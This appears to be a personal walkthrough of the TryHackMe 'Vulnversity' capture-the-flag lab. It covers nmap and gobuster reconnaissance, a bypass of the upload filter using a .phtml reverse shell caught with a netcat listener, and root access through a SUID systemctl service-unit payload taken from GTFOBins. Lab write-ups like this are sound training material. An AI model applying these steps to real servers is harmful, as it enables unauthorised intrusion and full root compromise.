Vulnversity — TryHackMe
[Task 1] — Deploy the machine
[Task 2] Reconnaissance
Gather information about this machine using a network scanning tool called
nmap.nmap is an free, open-source and powerful tool used to discover hosts and services on a computer network. In our example, we are using nmap to scan this machine to identify all services that are running on a particular port. nmap has many capabilities, below is a table summarising some of the functionality it provides.
Syntax: nmap -sV <machine ip>
4. How many ports will nmap scan if the flag -p-400 was used?
5. Using the nmap flag -n what will it not resolve?
Answer: dns
6. What is the most likely operating system this machine is running?
7. What port is the web server running on?
[Task 3] Locating directories using GoBuster
gobuster dir -u http://<ip>:3333 -w <word list location>
found an interesting directory, /internal
[Task 4] Compromise the webserver
- Try upload a few file types to the server, what common extension seems to be blocked?
I uploaded php reverse shell, but it was not allowed. - Upload “reverse_shell.phtml”
Success
Verify upload result in “/internal/uploads/”
At the attacker’s machine, type
nc -lvnp 9001
Click on upload file.
cat /etc/passwd
Now change directory to bill, cd /home/bill
cat user.txt, you will have your users flag.
[Task 5] Privilege Escalation
- On the system, search for all SUID files. What file stands out?
Reference: https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/
2. Become root and get the last flag (/root/root.txt)
Reference:
- https://gtfobins.github.io/gtfobins/systemctl/
- https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49
eop=$(mktemp).serviceecho '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' >$eop/bin/systemctl link $eop
/bin/systemctl enable --now $eop
Now after running that command from GTFobins.
run bash -p
Yupeee, We have root. Hope it will be hopefull.
